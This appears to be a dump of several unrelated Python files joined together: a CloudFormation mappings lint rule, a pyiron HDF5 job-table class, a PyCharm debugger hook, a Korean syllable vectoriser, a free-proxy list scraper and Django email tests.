source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/mappings-section-structure.html'
tags = ['mappings']
def match(self, cfn):
"""Check CloudFormation Parameters"""
matches = []
valid_map_types = (six.string_types, list, six.integer_types, float)
mappings = cfn.template.get('Mappings', {})
if mappings:
for mapname, mapobj in mappings.items():
if not isinstance(mapobj, dict):
message = 'Mapping {0} has invalid property'
matches.append(RuleMatch(
['Mappings', mapname],
message.format(mapname)
))
else:
for firstkey in mapobj:
firstkeyobj = mapobj[firstkey]
if not isinstance(firstkeyobj, dict):
message = 'Mapping {0} has invalid property at {1}'
matches.append(RuleMatch(
['Mappings', mapname, firstkey],
message.format(mapname, firstkeyobj)
))
else:
for secondkey in firstkeyobj:
if not isinstance(
firstkeyobj[secondkey], valid_map_types):
message = 'Mapping {0} has invalid property at {1}'
matches.append(RuleMatch(
['Mappings', mapname, firstkey, secondkey],
message.format(mapname, secondkey)
))
return matches
|
import numpy as np
import os
import pandas
import datetime
import h5io
from pyfileindex import PyFileIndex
from pyiron_base.generic.util import Singleton
from pyiron_base.database.generic import IsDatabase
def filter_function(file_name):
return ".h5" in file_name
class FileTable(IsDatabase, metaclass=Singleton):
def __init__(self, project):
self._fileindex = None
self._job_table = None
self._project = os.path.abspath(project)
self._columns = [
"id",
"status",
"chemicalformula",
"job",
"subjob",
"projectpath",
"project",
"timestart",
"timestop",
"totalcputime",
"computer",
"hamilton",
"hamversion",
"parentid",
"masterid",
"username",
]
self.force_reset()
def _get_view_mode(self):
return False
def force_reset(self):
self._fileindex = PyFileIndex(
path=self._project, filter_function=filter_function
)
df = pandas.DataFrame(self.init_table(fileindex=self._fileindex.dataframe))
if len(df) != 0:
df.id = df.id.astype(int)
self._job_table = df[np.array(self._columns)]
else:
self._job_table = pandas.DataFrame({k: [] for k in self._columns})
def init_table(self, fileindex, working_dir_lst=None):
if working_dir_lst is None:
working_dir_lst = []
fileindex = fileindex[~fileindex.is_directory]
fileindex = fileindex.iloc[fileindex.path.values.argsort()]
job_lst = []
for path, mtime in zip(fileindex.path, fileindex.mtime):
job_dict = self.get_extract(path, mtime)
job_dict["id"] = len(working_dir_lst) + 1
working_dir_lst.append(
job_dict["project"][:-1] + job_dict["subjob"] + "_hdf5/"
)
if job_dict["project"] in working_dir_lst:
job_dict["masterid"] = working_dir_lst.index(job_dict["project"]) + 1
else:
job_dict["masterid"] = None
job_lst.append(job_dict)
return job_lst
def add_item_dict(self, par_dict):
par_dict = dict((key.lower(), value) for key, value in par_dict.items())
if len(self._job_table) != 0:
job_id = np.max(self._job_table.id.values) + 1
else:
job_id = 1
default_values = {
"id": job_id,
"status": "initialized",
"chemicalformula": None,
"timestart": datetime.datetime.now(),
"computer": None,
"parentid": None,
"username": None,
"timestop": None,
"totalcputime": None,
"masterid": None,
}
for k, v in default_values.items():
if k not in par_dict.keys():
par_dict[k] = v
self._job_table = pandas.concat(
[self._job_table, pandas.DataFrame([par_dict])[self._columns]]
).reset_index(drop=True)
return int(par_dict["id"])
def item_update(self, par_dict, item_id):
if isinstance(item_id, list):
item_id = item_id[0]
if isinstance(item_id, str):
item_id = float(item_id)
for k, v in par_dict.items():
self._job_table.loc[self._job_table.id == int(item_id), k] = v
def delete_item(self, item_id):
item_id = int(item_id)
if item_id in [int(v) for v in self._job_table.id.values]:
self._job_table = self._job_table[
self._job_table.id != item_id
].reset_index(drop=True)
else:
raise ValueError
def get_item_by_id(self, item_id):
item_id = int(item_id)
return {
k: list(v.values())[0]
for k, v in self._job_table[self._job_table.id == item_id].to_dict().items()
}
def get_items_dict(self, item_dict, return_all_columns=True):
df = self._job_table
if not isinstance(item_dict, dict):
raise TypeError
for k, v in item_dict.items():
if k in ["id", "parentid", "masterid"]:
df = df[df[k] == int(v)]
elif "%" not in str(v):
df = df[df[k] == v]
else:
df = df[df[k].str.contains(v.replace("%", ""))]
df_dict = df.to_dict()
if return_all_columns:
return [{k: v[i] for k, v in df_dict.items()} for i in df_dict["id"].keys()]
else:
return [{"id": i} for i in df_dict["id"].values()]
def update(self):
self._job_table.status = [
self._get_job_status_from_hdf5(job_id)
for job_id in self._job_table.id.values
]
self._fileindex.update()
if len(self._job_table) != 0:
files_lst, working_dir_lst = zip(
*[
[project + subjob[1:] + ".h5", project + subjob[1:] + "_hdf5"]
for project, subjob in zip(
self._job_table.project.values, self._job_table.subjob.values
)
]
)
df_new = self._fileindex.dataframe[
~self._fileindex.dataframe.is_directory
& ~self._fileindex.dataframe.path.isin(files_lst)
]
else:
files_lst, working_dir_lst = [], []
df_new = self._fileindex.dataframe[~self._fileindex.dataframe.is_directory]
if len(df_new) > 0:
job_lst = self.init_table(
fileindex=df_new, working_dir_lst=list(working_dir_lst)
)
df = pandas.DataFrame(job_lst)[self._columns]
if len(files_lst) != 0 and len(working_dir_lst) != 0:
self._job_table = pandas.concat([self._job_table, df]).reset_index(
drop=True
)
else:
self._job_table = df
def _get_table_headings(self, table_name=None):
return self._job_table.columns.values
def _get_job_table(
self,
sql_query,
user,
project_path=None,
recursive=True,
columns=None,
element_lst=None,
):
self.update()
if project_path is None:
project_path = self._project
if len(self._job_table) != 0:
if recursive:
return self._job_table[
self._job_table.project.str.contains(project_path)
]
else:
return self._job_table[self._job_table.project == project_path]
else:
return self._job_table
def get_jobs(self, project=None, recursive=True, columns=None):
if project is None:
project = self._project
if columns is None:
columns = ["id", "project"]
df = self.job_table(
sql_query=None,
user=None,
project_path=project,
recursive=recursive,
columns=columns,
)
if len(df) == 0:
dictionary = {}
for key in columns:
dictionary[key] = list()
return dictionary
# return {key: list() for key in columns}
dictionary = {}
for key in df.keys():
dictionary[key] = df[
key
].tolist() # ToDo: Check difference of tolist and to_list
return dictionary
def get_job_ids(self, project=None, recursive=True):
return self.get_jobs(project=project, recursive=recursive, columns=["id"])["id"]
def get_job_id(self, job_specifier, project=None):
if project is None:
project = self._project
if isinstance(job_specifier, (int, np.integer)):
return job_specifier # is id
job_specifier.replace(".", "_")
job_id_lst = self._job_table[
(self._job_table.project == project)
& (self._job_table.job == job_specifier)
].id.values
if len(job_id_lst) == 0:
job_id_lst = self._job_table[
self._job_table.project.str.contains(project)
& (self._job_table.job == job_specifier)
].id.values
if len(job_id_lst) == 0:
return None
elif len(job_id_lst) == 1:
return int(job_id_lst[0])
else:
raise ValueError(
"job name '{0}' in this project is not unique".format(job_specifier)
)
def get_child_ids(self, job_specifier, project=None, status=None):
"""
Get the childs for a specific job
Args:
database (DatabaseAccess): Database object
sql_query (str): SQL query to enter a more specific request
user (str): username of the user whoes user space should be searched
project_path (str): root_path - this is in contrast to the project_path in GenericPath
job_specifier (str): name of the master job or the master jobs job ID
status (str): filter childs which match a specific status - None by default
Returns:
list: list of child IDs
"""
if project is None:
project = self._project
id_master = self.get_job_id(project=project, job_specifier=job_specifier)
if id_master is None:
return []
else:
if status is not None:
id_lst = self._job_table[
(self._job_table.masterid == id_master)
& (self._job_table.status == status)
].id.values
else:
id_lst = self._job_table[
(self._job_table.masterid == id_master)
].id.values
return sorted(id_lst)
def get_job_working_directory(self, job_id):
"""
Get the working directory of a particular job
Args:
job_id (int):
Returns:
str: working directory as absolute path
"""
try:
db_entry = self.get_item_by_id(job_id)
if db_entry and len(db_entry) > 0:
job_name = db_entry["subjob"][1:]
return os.path.join(
db_entry["project"],
job_name + "_hdf5",
job_name,
)
else:
return None
except KeyError:
return None
def _get_job_status_from_hdf5(self, job_id):
db_entry = self.get_item_by_id(job_id)
job_name = db_entry["subjob"][1:]
return get_job_status_from_file(
hdf5_file=os.path.join(db_entry["project"], job_name + ".h5"),
job_name=job_name,
)
def get_job_status(self, job_id):
return self._job_table[self._job_table.id == job_id].status.values[0]
def set_job_status(self, job_id, status):
db_entry = self.get_item_by_id(item_id=job_id)
self._job_table.loc[self._job_table.id == job_id, "status"] = status
h5io.write_hdf5(
db_entry["project"] + db_entry["subjob"] + ".h5",
status,
title=db_entry["subjob"][1:] + "/status",
overwrite="update",
)
@staticmethod
def get_extract(path, mtime):
basename = os.path.basename(path)
job = os.path.splitext(basename)[0]
time = datetime.datetime.fromtimestamp(mtime)
return {
"status": get_job_status_from_file(hdf5_file=path, job_name=job),
"chemicalformula": None,
"job": job,
"subjob": "/" + job,
"projectpath": None,
"project": os.path.dirname(path) + "/",
"timestart": time,
"timestop": time,
"totalcputime": 0.0,
"computer": None,
"username": None,
"parentid": None,
"hamilton": get_hamilton_from_file(hdf5_file=path, job_name=job),
"hamversion": get_hamilton_version_from_file(hdf5_file=path, job_name=job),
}
def get_hamilton_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + "/TYPE").split(".")[-1].split("'")[0]
def get_hamilton_version_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + "/VERSION")
def get_job_status_from_file(hdf5_file, job_name):
if os.path.exists(hdf5_file):
return h5io.read_hdf5(hdf5_file, job_name + "/status")
else:
return None
|
import os
if 'DEBUG_SERVER' in os.environ:
# connect to debugger
import pydevd_pycharm
hostname, port = os.environ['DEBUG_SERVER'].split(':')
pydevd_pycharm.settrace(hostname, port=int(port),
stdoutToServer=True, stderrToServer=True)
|
import numpy as np
from .LETTERS import kor_phonemes, kor_re, eng_phonemes, eng_re
import numpy as np
# 일본어는 나중에
# https://m.blog.naver.com/PostView.nhn?blogId=aoba8615&logNo=140012660052&proxyReferer=https:%2F%2Fwww.google.com%2F
def check_encodings(string):
"""
문자열의 인코딩을 확인하는 함수
문자열이 유니코드가 아니면 디코드해서 변환
:param string: 확인하고 싶은 문자열
:return: 유니코드로 변환된 문자열
"""
pass
def syll_lang(syllable):
"""
음절의 언어를 분류해주는 함수
현재는 한글, 영어, 특수문자를 구분
한글, 영어 이외에는 모두 특수문자 취급
추후 일본어, 기타 음소문자 및 음운문자 대상으로 확장할 것
:param syllable: 입력 음절
:return language: 분류 결과
"""
kor = any([True if syllable in v else False for k, v in kor_phonemes.items()] +
[0xac00 - 1 < ord(syllable) < 0xac00 + 11172])
eng = any([True if syllable.lower() in v else False for k, v in eng_phonemes.items()])
if kor:
language = 'kor'
elif eng:
language = 'eng'
else:
language = 'sc'
return language
def syll2vect_kor(syllable):
kor_startpoint = 0xac00
if kor_startpoint - 1 < ord(syllable) < kor_startpoint + 11172:
vector = [kor_phonemes['onset'][(ord(syllable) - kor_startpoint) // (28 * 21)],
kor_phonemes['nucleua'][((ord(syllable) - kor_startpoint) % (28 * 21)) // 28],
kor_phonemes['coda'][(ord(syllable) - kor_startpoint) % 28]]
elif syllable in kor_phonemes['nucleua']:
vector = ['', syllable, '']
else:
vector = [syllable, '', '']
return vector
def syll2vect_eng(syllable):
if syllable.lower() in eng_phonemes['consonants']:
vector = [syllable, '', '']
else:
vector = ['', syllable, '']
return vector
def syll2vect_sc(syllable):
vector = ['', '', syllable]
return vector
def syll2vect(syllable):
"""
음절을 벡터로 변환하는 함수
:param syllable: 입력 음절
:return vector: 변환된 벡터
"""
trans_dict = {
'kor': syll2vect_kor,
'eng': syll2vect_eng,
'sc': syll2vect_sc
}
vector = trans_dict[syll_lang(syllable)](syllable)
return vector
def sent2vects(sentence):
"""
문장의 음절을 벡터로 변환하는 함수
:param sentence: 바꿔야할 문장
:return vectors: 벡터로 바뀐 문장
"""
vectors = [syll2vect(syllable) for syllable in sentence]
return np.array(vectors)
def vect_lang(vector):
joined_vect = ''.join(vector)
kor = kor_re.search(joined_vect)
eng = eng_re.search(joined_vect)
if kor:
language = 'kor'
elif eng:
language = 'eng'
else:
language = 'sc'
return language
def vect2syll_kor(vector):
syllable = ''.join(vector)
if len(syllable) > 1:
# onset, nucleua, coda = (kor_phonemes[element].index(vector[i]) for i, element in enumerate(kor_phonemes.keys()))
onset = kor_phonemes['onset'].index(vector[0])
nucleua = kor_phonemes['nucleua'].index(vector[1])
coda = kor_phonemes['coda'].index(vector[2])
syllable = chr(((onset * 21) + nucleua) * 28 + coda + 0xac00)
return syllable
def vect2syll_etc(vector):
syllable = ''.join(vector)
return syllable
def vect2syll(vector):
trans_dict = {
'kor': vect2syll_kor,
'eng': vect2syll_etc,
'sc': vect2syll_etc
}
syllable = trans_dict[vect_lang(vector)](vector)
return syllable
def vects2sent(vectors):
sentence = ''.join([vect2syll(vector) for vector in vectors])
return sentence
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: proxyFetcher
Description :
Author : JHao
date: 2016/11/25
-------------------------------------------------
Change Activity:
2016/11/25: proxyFetcher
-------------------------------------------------
"""
__author__ = 'JHao'
import re
from time import sleep
from setting import PROXIES
from util.webRequest import WebRequest
class ProxyFetcher(object):
"""
proxy getter
"""
@staticmethod
def freeProxy01():
"""
米扑代理 https://proxy.mimvp.com/
:return:
"""
url_list = [
'https://proxy.mimvp.com/freeopen?proxy=in_hp',
'https://proxy.mimvp.com/freeopen?proxy=out_hp'
]
port_img_map = {'DMxMjg': '3128', 'Dgw': '80', 'DgwODA': '8080',
'DgwOA': '808', 'DgwMDA': '8000', 'Dg4ODg': '8888',
'DgwODE': '8081', 'Dk5OTk': '9999'}
for url in url_list:
html_tree = WebRequest().get(url).tree
for tr in html_tree.xpath(".//table[@class='mimvp-tbl free-proxylist-tbl']/tbody/tr"):
try:
ip = ''.join(tr.xpath('./td[2]/text()'))
port_img = ''.join(tr.xpath('./td[3]/img/@src')).split("port=")[-1]
port = port_img_map.get(port_img[14:].replace('O0O', ''))
if port:
yield '%s:%s' % (ip, port)
except Exception as e:
print(e)
@staticmethod
def freeProxy02():
"""
代理66 http://www.66ip.cn/
:return:
"""
url = "http://www.66ip.cn/mo.php"
resp = WebRequest().get(url, timeout=10)
proxies = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})', resp.text)
for proxy in proxies:
yield proxy
@staticmethod
def freeProxy03():
""" 开心代理 """
target_urls = ["http://www.kxdaili.com/dailiip.html", "http://www.kxdaili.com/dailiip/2/1.html"]
for url in target_urls:
tree = WebRequest().get(url).tree
for tr in tree.xpath("//table[@class='active']//tr")[1:]:
ip = "".join(tr.xpath('./td[1]/text()')).strip()
port = "".join(tr.xpath('./td[2]/text()')).strip()
yield "%s:%s" % (ip, port)
@staticmethod
def freeProxy04():
""" 蝶鸟IP """
url = "https://www.dieniao.com/FreeProxy.html"
tree = WebRequest().get(url, verify=False).tree
for li in tree.xpath("//div[@class='free-main col-lg-12 col-md-12 col-sm-12 col-xs-12']/ul/li")[1:]:
ip = "".join(li.xpath('./span[1]/text()')).strip()
port = "".join(li.xpath('./span[2]/text()')).strip()
yield "%s:%s" % (ip, port)
@staticmethod
def freeProxy05(page_count=1):
""" 快代理 https://www.kuaidaili.com """
url_pattern = [
'https://www.kuaidaili.com/free/inha/{}/',
'https://www.kuaidaili.com/free/intr/{}/'
]
url_list = []
for page_index in range(1, page_count + 1):
for pattern in url_pattern:
url_list.append(pattern.format(page_index))
for url in url_list:
tree = WebRequest().get(url).tree
proxy_list = tree.xpath('.//table//tr')
sleep(1) # 必须sleep 不然第二条请求不到数据
for tr in proxy_list[1:]:
yield ':'.join(tr.xpath('./td/text()')[0:2])
@staticmethod
def freeProxy06():
""" PROXY11 https://proxy11.com """
url = "https://proxy11.com/api/demoweb/proxy.json?country=hk&speed=2000"
try:
resp_json = WebRequest().get(url).json
for each in resp_json.get("data", []):
yield "%s:%s" % (each.get("ip", ""), each.get("port", ""))
except Exception as e:
print(e)
@staticmethod
def freeProxy07():
""" 云代理 """
urls = ['http://www.ip3366.net/free/?stype=1', "http://www.ip3366.net/free/?stype=2"]
for url in urls:
r = WebRequest().get(url, timeout=10)
proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
for proxy in proxies:
yield ":".join(proxy)
@staticmethod
def freeProxy08():
""" 小幻代理 """
urls = ['https://ip.ihuan.me/address/5Lit5Zu9.html']
for url in urls:
r = WebRequest().get(url, timeout=10)
proxies = re.findall(r'>\s*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*?</a></td><td>(\d+)</td>', r.text)
for proxy in proxies:
yield ":".join(proxy)
@staticmethod
def freeProxy09(page_count=1):
""" 免费代理库 """
for i in range(1, page_count + 1):
url = 'http://ip.jiangxianli.com/?country=中国&page={}'.format(i)
html_tree = WebRequest().get(url).tree
for index, tr in enumerate(html_tree.xpath("//table//tr")):
if index == 0:
continue
yield ":".join(tr.xpath("./td/text()")[0:2]).strip()
@staticmethod
def freeProxy10():
""" 89免费代理 """
r = WebRequest().get("https://www.89ip.cn/index_1.html", timeout=10)
proxies = re.findall(
r'<td.*?>[\s\S]*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\s\S]*?</td>[\s\S]*?<td.*?>[\s\S]*?(\d+)[\s\S]*?</td>',
r.text)
for proxy in proxies:
yield ':'.join(proxy)
# @staticmethod
# def wallProxy01():
# """
# PzzQz https://pzzqz.com/
# """
# from requests import Session
# from lxml import etree
# session = Session()
# try:
# index_resp = session.get("https://pzzqz.com/", timeout=20, verify=False).text
# x_csrf_token = re.findall('X-CSRFToken": "(.*?)"', index_resp)
# if x_csrf_token:
# data = {"http": "on", "ping": "3000", "country": "cn", "ports": ""}
# proxy_resp = session.post("https://pzzqz.com/", verify=False,
# headers={"X-CSRFToken": x_csrf_token[0]}, json=data).json()
# tree = etree.HTML(proxy_resp["proxy_html"])
# for tr in tree.xpath("//tr"):
# ip = "".join(tr.xpath("./td[1]/text()"))
# port = "".join(tr.xpath("./td[2]/text()"))
# yield "%s:%s" % (ip, port)
# except Exception as e:
# print(e)
# @staticmethod
# def freeProxy10():
# """
# 墙外网站 cn-proxy
# :return:
# """
# urls = ['http://cn-proxy.com/', 'http://cn-proxy.com/archives/218']
# request = WebRequest()
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W]<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
# @staticmethod
# def freeProxy11():
# """
# https://proxy-list.org/english/index.php
# :return:
# """
# urls = ['https://proxy-list.org/english/index.php?p=%s' % n for n in range(1, 10)]
# request = WebRequest()
# import base64
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r"Proxy\('(.*?)'\)", r.text)
# for proxy in proxies:
# yield base64.b64decode(proxy).decode()
# @staticmethod
# def freeProxy12():
# urls = ['https://list.proxylistplus.com/Fresh-HTTP-Proxy-List-1']
# request = WebRequest()
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
@staticmethod
def proxyDBNet():
urls = [
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=CN',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=SG',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=US',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=CZ',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=AR',
]
request = WebRequest()
for url in urls:
r = request.get(url, timeout=20)
proxies = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d+)', r.text)
for proxy in proxies:
yield proxy
@staticmethod
def zdayeCom():
urls = 'https://www.zdaye.com/dayProxy.html'
request = WebRequest()
detail_url = 'https://www.zdaye.com' + request.get(urls, timeout=10).tree.xpath('//h3[@class="thread_title"]//a/@href')[0]
proxy_list = request.get(detail_url, timeout=10).tree.xpath('//a[contains(@href,"/ip/CheckHttp/")]/@href')
for url in proxy_list:
proxy = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d+)',url)
if proxy:
yield proxy[0]
# @staticmethod
# def freeproxyCz():
# url = "https://spys.one/free-proxy-list/CN/"
# request = WebRequest()
# r = request.get(url, timeout=10, proxies=PROXIES)
# print( r.text)
# proxies = re.findall(r"document\.write\(Base64\.decode\(\"(.*?)\"\).*?\"fport\".*?>(.*?)<", r.text)
# for proxy in proxies:
# yield proxy
# # yield base64.b64decode(proxy).decode()
@staticmethod
def proxynovaCom():
url = "https://www.proxynova.com/proxy-server-list/country-cn"
request = WebRequest()
r = request.get(url, timeout=10, proxies=PROXIES)
proxies = re.findall(r"document\.write\(\"(.*?)\"\).*?\".*?>(\d+)</", r.text.replace("\n", "").replace(" ", ""))
for proxy in proxies:
yield re.sub(r'[\"\+]', '', proxy[0]) + ":" + proxy[1]
"""
# 需要翻墙
# http://free-proxy.cz/zh/
# https://free-proxy-list.net/anonymous-proxy.html
# http://free-proxy.cz/en/proxylist/country/CN/all/ping/all
# https://spys.one/free-proxy-list/CN/
"""
if __name__ == '__main__':
p = ProxyFetcher()
for _ in p.proxynovaCom():
print(_)
|
from datetime import datetime
import json
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.core.management import call_command
from django.test import TestCase, SimpleTestCase
from django.test.utils import override_settings
from django_dynamic_fixture import G
from entity.models import Entity, EntityRelationship, EntityKind
from entity_event.models import (
Medium, Source, Subscription, Unsubscription, Event, EventActor
)
from freezegun import freeze_time
from mock import patch
from entity_emailer.interface import EntityEmailerInterface
from entity_emailer.models import Email
from entity_emailer.tests.utils import g_email
from entity_emailer.utils import extract_email_subject_from_html_content, create_email_message, \
get_subscribed_email_addresses, get_from_email_address
class ExtractEmailSubjectFromHtmlContentTest(SimpleTestCase):
def test_blank(self):
subject = extract_email_subject_from_html_content('')
self.assertEquals(subject, '')
def test_with_title_block(self):
subject = extract_email_subject_from_html_content('<html><head><title> Hello! </title></head></html>')
self.assertEquals(subject, 'Hello!')
def test_wo_title_block_under_40_chars_content(self):
subject = extract_email_subject_from_html_content(' Small content ')
self.assertEquals(subject, 'Small content')
def test_wo_title_block_under_40_chars_multiline_content(self):
subject = extract_email_subject_from_html_content((
' Small content \n'
'that spans multiple lines'
))
self.assertEquals(subject, 'Small content')
def test_wo_title_block_gt_40_chars_content(self):
subject = extract_email_subject_from_html_content((
' This is reallly long content that is greater than 40 chars on the first line. It should have ...'
))
self.assertEquals(subject, 'This is reallly long content that is gre...')
class ConvertEventsToEmailsTest(TestCase):
def setUp(self):
call_command('add_email_medium')
self.email_medium = Medium.objects.get(name='email')
def test_no_events(self):
EntityEmailerInterface.convert_events_to_emails()
self.assertFalse(Email.objects.exists())
def test_no_subscriptions(self):
G(Event, context={})
EntityEmailerInterface.convert_events_to_emails()
self.assertFalse(Email.objects.exists())
def test_default_from_email(self):
# settings.DEFAULT_FROM_EMAIL is already set to test@example.com
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEqual(email.from_address, 'test@example.com')
def test_custom_from_email(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
'from_address': 'custom@example.com'
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEqual(email.from_address, 'custom@example.com')
@freeze_time('2013-1-2')
def test_basic_only_following_false_subscription(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(list(email.recipients.all()), [e])
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_subscription_marked_seen(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(list(email.recipients.all()), [e])
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_true_subscription(self):
source = G(Source)
e = G(Entity)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
# Since the other_e entity does not follow the se entity, only the e entity receives an email
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_super_entity_only_following_false_subscription(self):
source = G(Source)
e = G(Entity)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
G(EventActor, event=event, entity=other_e)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_true_group_subscription(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
# Both entities are subscribed with a group subscription and are following the super entity of the event
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_group_subscription(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
# Both entities are subscribed with a group subscription and are following the super entity of the event
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_group_subscription_with_unsubscribed(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=False)
G(Unsubscription, entity=e, source=source, medium=self.email_medium)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_multiple_events_only_following_false(self):
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
G(Event, source=source, context=email_context)
EntityEmailerInterface.convert_events_to_emails()
self.assertEquals(Email.objects.count(), 2)
for email in Email.objects.all():
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
